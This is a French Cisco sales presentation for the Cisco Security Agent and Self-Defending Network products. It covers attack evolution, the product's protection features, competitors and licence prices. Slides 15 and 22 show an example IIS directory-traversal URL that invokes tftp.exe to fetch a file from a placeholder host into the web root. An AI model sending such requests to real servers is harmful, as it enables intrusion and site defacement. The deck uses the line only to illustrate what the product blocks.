CSA_Presentation_Commerciale.ppt

1
© 2003 Cisco Systems, Inc. All rights reserved.
Cisco Self Defending Network
Les réseaux capables de se défendre
tout seul

2
2
2
Réseaux des années 90s
LS
FR
X.25
ATM

3
3
3
Réseaux des années 2000
Mobilité :
• Nouvelles méthodes
d’accès au réseau :
Accès VPN
Accès Wireless
• Besoins d’ouverture
des datacenters
• Généralisation de la
messagerie
électronique
• Généralisation des
technologies Web
• Généralisation d’OS
et d’applications
cibles privilégiées
d’attaques

4
4
4
Nouvelles contraintes…
Problème
Vers Virus
- Dégats plus graves
- Propagation plus rapide
- Patches plus fréquents
On ne peut pas tout protéger
- PC des visiteurs/interimaires
- OS/Systemes non supportés
On ne connait pas tous les clients
- Clients non managés
- De plus en plus de terminaux
non sécurisés (PDA)
Isoler les éléments nocifs
- Systemes infectés
- etc.

5
5
5
… Nouvelles solutions !
Problème Solution
Nouvelles attaques
Protéger les machines
- Protection “Day Zero”
- Architecture sans MAJ
- Patchs automatiques
Trop d’éléments à
protéger
Créer des “ilots de sécurité” pour les éléments clé
- Protection FW et IDS (Fermes de serveurs)
- Déploiement des services réseau (résilience)
- Consolidations des Data Centers
Clients et OS inconnus
Déployer un contrôle d’admission
- Valider l’elligibilité de la machine
- Isoler/Mise en quarantine des machines
non autorisées
Isoler les systèmes
infectés
Déployer IDS/IPS partout
- Identifier les systèmes, minimiser les
dommages, contrôler la propagation
- Corellation d’événements

6
6
6
Le Système de défense Cisco
PIX Security Appliance, IOS FW, Catalyst
6500 FWSM
Network IDS
Protection des points d’extrémité
Services réseau
Intelligent Investigation
Content Security
Security Management
Firewall
IDS Appliances, Catalyst IDS Module,
Router IDS Module, IOS-IDS
Cisco Security Agent (CSA)
Netflow, NBAR, CAR, Private Vlans, DHCP
Snooping, Dynamic ARP Inspection,
ACLs, QoS features
Cisco Threat Response (CTR)
Content Engines, Router Network
Modules
Device Managers, CiscoWorks VMS, ISC,
CiscoWorks SIMS

7
7
7
L’approche de la sécurité doit changer !
Avant Maintenant
Produits Isolés
Produits spécialisés
Reactive
Proactive et
automatisée
Intégrée à
l’infrastructure
Intégrée aux
Systèmes d’extrémités

8
8
8
Initiative Cisco Self-Defending Network
Durcissement
du réseau
Contrôle
de l’accès au
réseau
Protection des
systèmes
IOS CNAC
CSA

9
9
9
Durcissement du réseau
- Renforcement des accès administrateurs
- Protection anti Déni de Service
- Buffer overflow
- Dépassement de charge CPU
- Dépassement capacité mémoire
ALARM
Durcissement
De l’IOS
2001 Today

10
10
10
Contrôle de l’accès au réseau
Cisco Network Admission Control
Station CAMPUS
Corporate Network
1. Tentative de connexion d’un
système d’extrémité non
conforme
2. Mise en
quarantaine
3. Confinement des
infections
VLAN de Quarantaine
Cisco
Trust
Agent
Objectif : Lier la sécurité du réseau (802.1x) à
la sécurité système

11
11
11
Phasing de CNAC
Phase 1
Q2 CY04
Phase 2
2HCY04
Equipements
réseau
Routeurs IOS
17xx – 72xx
Support de
l’agent Cisco
Trust Agent
Integration
1/3 partie
Protocoles
utilisés
Traitement des
Stations sans
réponse
Méthode de
Quarantine
Phase 3
TBD
Windows
NT, 2000, XP
Editeurs
d’Anti Virus
Layer 3
EAP/UDP
Liste d’exception,
règle unique
Layer 3 ACLs
Switches
AP Wireless
Windows 2003
Red Hat Linux
Solaris
Editeurs d’OS et de
consoles de Mgmt
Layer 2
EAP/802.1x
Politique
différenciée
VLANs, 802.1X DHCP,
Layer 3 ACLs
PACLs
Produits de Sécurité
Concentrateurs VPN
Téléphones IP
Cisco Appliances
MAC OS, HPUX, AIX
Tous types
QoS
Téléchargement
d’Applet ?
HTTP/SSL?

12
Cisco Security Agent
Protection des systèmes (Serveurs et Desktop)

13
13
13
Augmentation de
la complexité des
attaques
Packet Forging/
Spoofing
1990
1980
Password
Guessing
Self Replicating
Code
Password
Cracking
Exploiting Known
Vulnerabilities
Disabling
Audits
Back
Doors
Hijacking
Sessions
Sweepers
Sniffers
Stealth
Diagnostics
High
Low 2000
DDOS
Internet
Worms
Evolution des attaques

14
14
14
mbehring
Objectif de l’attaque :
corrompre les postes internes
Router A Router B Cible
PC
Corrompus
Hacker
PC
« Innocents »

15
15
15
Les attaques traversent les firewalls !
Firewall Serverfarms
http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:inetpubwwwrootdefault.htm

16
16
16
Exemple : Code Red

17
17
17
Déroulement d’une attaque
• Objectif de l’attaque :
Paralyser le système d’information
Frapper plus vite que la défense, plus vite que l’antivirus
Go !
Phase 1 : Localiser
- Les accès
- Les systèmes
Phase 2 : Infecter
persister
multiplier
Phase 3 : Paralyser
Bingo !
T0 T3
T1 T2

18
18
18
Stratégie de défense antivirus
Prévention
de l’attaque
$$
Notification
et
Assurance
$
Edition
De la
Signature
$$
Scan
Et
Elimination
$$
Contrôle
Et
Eradication
$$$$
Restauration
$$$$
Information
sur la
menace
$
Prévention contre les attaques connues Réponse antivirus Restauration après infection
T1
T5 - Eradication
Totale
T5
T1 – première infection

19
19
19
La rapidité des attaques s’accélére !
Etendue
des
dommages
Semaines
Jours
Minutes
Secondes
1980s 1990s Aujourd’hui Demain
Agir plus vite !

20
20
20
Stratégie de Défense Cisco Security Agent
T1 T5
$$ $
Edition
De la
Signature
$$
Scan
Et
Elimination
$$
Contrôle
Et
Eradication
$$$$
Restauration
$$$$
$
Prévention contre les attaques connues Réponse antivirus Restauration après infection
T1 T5
Agir à T0 : aucune infection possible !
Prévention
de l’attaque
Notification
et
Assurance
Information
sur la
menace

21
Positionnement de CSA

22
22
22
Firewall Serverfarms
http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:inetpubwwwrootdefault.htm
Protection de l’OS
- Buffer Overflow
- Appels systèmes malveillants
Protection des fichiers systèmes
Protection des fichiers utilisateurs
Alerte de l’administrateur

23
23
23
Durcissement du système
Observation comportementale
Network Protocol Stack
Host Operating System
Web
Server
Email
Client
Web
Browser
. . .
1 - Interdiction des opérations malicieuses
2 - Notification de l’usager et de l’administrateur
Network Interceptor
Contrôle d’intégrité sur
- Tout paquet entrant
- Tout paquet sortant
System Call Interceptor
Contrôle des accès :
- Au Système de fichiers
- A la base de registre
- Aux Objets COM
- Aux services HTTP
- A la mémoire
- De l’execution de code
CSA
CSA

24
24
24
CSA Fonctions de sécurité
• Durcissement de l’OS
Protection anti Syn-flood
Détection des paquets mal formés
Contrôle de la validité des services
résidents sur la machine
• Protection des ressources système
Contrôle des accès aux fichiers
Contrôle des accès au réseau
Contrôle des accès a la base de
registre
Contrôle des accès aux composants
com
• Contrôle des .exe
Protection contre les vers (email)
Protection contre l’exécution de
fichiers téléchargés (.exe, ActiveX)
• Défense des Applications
Contrôle de l’exécution correcte du
code
Contrôle des versions de fichiers
exécutables
Protection contre l’injection de code
Protection de la gestion mémoire
Protection anti buffer overflows
(saturation de mémoire de travail de
la CPU)
Protection contre la capture de le
frappe clavier
• Surveillance de l’activité réseau
Lancement de sniffer pirate ou de
protocole non autorisé sur la
machine
Scan réseau
Capture de log systèmes

25
25
25
Situation & Concurrence
• Système de Détection d’Intrusion (HIDS)
Détection des attaques avec remontée d’alerte
ISS et Symantec
Gartner, Network Computing: “HIDS est mort”
Pourquoi détecter seulement quand on peut protéger ?
• Firewall personnel
Filtrage applicatif
Zone Alarm (Checkpoint), Personal Firewall (Symantec)
• Systèmes de Protection d’Intrusion (HIPS)
Détection des attaques avec traitement immédiat et remontée
d’alerte
Entercept (NAI), eTrust (CA), Harris, Argus, Sana

26
26
26
Différenciation de CSA
CSA
Firewall
Distribué
Conventionnel
Blocage des requêtes réseaux entrantes
Analyse de paquets - inspection d’état
Détection et blocage du scan de ports
Détection et blocage d’applications malicieuses
Blocage d’attaques Buffer Overflows connues
Prévention des modifications de fichiers systèmes
Vérouillage de l’Operating System
Host-based
IDS
Conventionnel
Blocage d’attaques Buffer Overflows non connues
Blocage des requêtes réseaux sortantes
Détection et blocage du DoS
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
Blocage d’attaques “Zero-day” X
X
Détection
Détection
X

27
27
27
Différenciation de CSA
CSA Anti-Virus
Protection contre tout codes malicieux
X
Protection anti Virus / Vers connus
Protection anti Virus / Vers non connnus
Scanning et détection de fichier corrompus
Nettoyage des fichiers infectés
Identification des Virus / Vers
Pas d’update de signatures
Fonctionnalité Firewall distribué
Vérouillage de l’Operating System
Corrélation d’évènements
X
X
X
X
X
X
X
X
X

28
Composition de l’offre

29
29
29
Architecture Cisco Security Agent
SNMP
Traps
Custom
Programs
Local
File
• Gestion centralisée des règles et des alertes – CSA
MC
• Agents Desktops
• Agents Serveurs
Browser-based
Management GUI
Configuration
Reports, Events
VMS
E-Mail
Pagger
Agents Serveurs
CSA
Management
Center
Agents Desktop
Policy updates

30
30
30
CSA Starter Bundle
• CiscoWorks VPN/Security Management Solution
(VMS) Basic 2.2
• CiscoWorks Management Center for Cisco Security
Agents 4.01 (CMC)
• 1 agent CSA Serveur
• 10 agents CSA Desktop
• Les ajouts de licences en supplément

31
31
31
Agents Serveurs
• Agent Windows
Windows 2000 Server and Advanced Server
Windows NT 4.0 Server and Enterprise Server (Service
Pack 5 or later)
• Agent Solaris
Solaris 8 Service Pack ARC architecture (64-bit kernel)

32
32
32
Agent Desktop
• Windows uniquement
Windows NT 4 Workstation (Service Pack 5 or later)
Windows 2000 Professional
Windows XP Professional

33
33
33
CSA Management Center
Références Désignation Prix €
CSA-STARTER-K9= CSA Starter Bundle 2 700 €
CWVMS-2.2-UR-K9 VMS 2.2 WIN/SOL Unrestricted 17 996 €
CWVMS-2.2-UR-MR-K9 Minor Release update for VMS 2.X Unrestricted 896 €

34
34
34
Prix des licences Serveurs
CSA-SRVR-K9= Agent CSA Serveur (Win + Sol), 1 Agent 1 755 €
CSA-B10-SRVR-K9 Agent CSA Serveur (Win + Sol), 10 Agent Bundle 17 199 €
CSA-B1000-SRVR-K9 Agent CSA Serveur (Win + Sol), 1000 Agent Bundle 1 228 500 €

35
35
35
Prix des licences Desktop
CSA-B25-DTOP-K9 CSA Agent Desktop (Win + Sol), 25 Agent Bundle 1 913 €
CSA-B2500-DTOP-K9 CSA Agent Desktop, 2500 Agent Bundle 133 875 €
CSA-B5000-DTOP-K9 CSA Agent Desktop, 5000 Agent Bundle 240 975 €
CSA-B10000-DTOP-K9 CSA Agent Desktop, 10,000 Agent Bundle 420 750 €

36
En résumé

37
37
37
Productivité - Efficacité
• Défense préventive et non pas corrective
• Aucun effort d’analyse de log IDS. Aucun travail de filtrage de
log nécessaire
• Aucune mise à jour de signature nécessaire
• Facile et rapide à déployer (30 min)
• Industrialisable (10000 agents / serveur CSA MC)
• Gestion centralisée des règles de sécurité
• Gestion centralisée des alertes
• Corrélation d’alertes

38
38
38
Politiques de sécurité paramétrables
• Exploitable sans aucun paramétrage
Fournit en standard avec un ensemble complet de règles de
sécurité couvrant 90 % des besoins de protection système
Agents pré-configurés selon certains usages types (IPTel par
exemple)
• Complètement paramétrable si besoin est
Verrouiller l’usage des applications
Définir et distribuer de nouvelles règles de sécurité
Rapidement adaptable à de nouveaux besoins applicatifs, sans
aucune mise à jour système (juste des règles)

CSA_Presentation_Commerciale.ppt

Recommandé

Recommandé

Contenu connexe

Similaire à CSA_Presentation_Commerciale.ppt

Similaire à CSA_Presentation_Commerciale.ppt (20)

CSA_Presentation_Commerciale.ppt